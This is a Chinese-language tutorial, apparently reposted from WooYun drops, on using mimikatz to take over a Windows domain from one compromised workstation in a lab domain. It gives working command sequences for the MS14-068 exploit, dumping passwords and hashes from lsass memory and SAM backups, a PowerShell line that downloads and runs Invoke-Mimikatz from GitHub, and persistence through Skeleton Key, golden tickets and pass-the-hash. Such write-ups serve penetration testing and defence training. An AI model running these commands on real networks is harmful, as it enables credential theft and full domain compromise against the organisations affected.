原文:
http://drops.wooyun.org/tips/7547
上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz
mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单
网络资源管理模式:
域已有资源:
域内一台主机权限 操作系统:win7 x64 域权限:普通用户1、获得域控权限 2、导出所有用户口令 3、维持域控权限
获取本机用户名、口令、sid、LM hash、NTLM hash 如图
使用ms14-068漏洞
ms14-068.exe -u -p -s -d生成伪造缓存test.ccache:
如图 导入伪造缓存: mimikatz:
kerberos::ptc test.ccache登陆:
net use \\A-635ECAEE64804.TEST.LOCAL dir \\A-635ECAEE64804.TEST.LOCAL\c$获得域控权限,如图
(1)直接获取内存口令 mimikatz:
privilege::debug sekurlsa::logonpasswords(2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz:
sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full(3)通过powershell加载mimikatz获取口令
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz(4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍) mimikatz:
lsadump::sam SYSTEM.hiv SAM.hiv(1)Skeleton Key mimikatz:
privilege::debug misc::skeleton万能钥匙,可使用任意用户登陆域控
net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test如图
(2)golden ticket mimikatz:
lsadump::lsa /patch获取krbtgt的ntlmhash,如图
生成万能票据: mimikatz:
kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi导入票据: mimikatz:
kerberos::ptt test.kirbi登陆域控:
net use \\A-635ECAEE64804.TEST.LOCAL dir \\A-635ECAEE64804.TEST.LOCAL\c$如图
(3)Pass-The-Hash mimikatz:
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a如图
登陆域控,刷新扫雷记录,留下名字;D mimikatz:
minesweeper::infos如图
本文重点在于介绍mimikatz在内网渗透中的常用方法,其它细节做了适当省略,可在后续详细介绍细节。
本文由三好学生原创并首发于乌云drops,转载请注明,谢谢神器在手,会用才行;) 水平有限,欢迎补充。
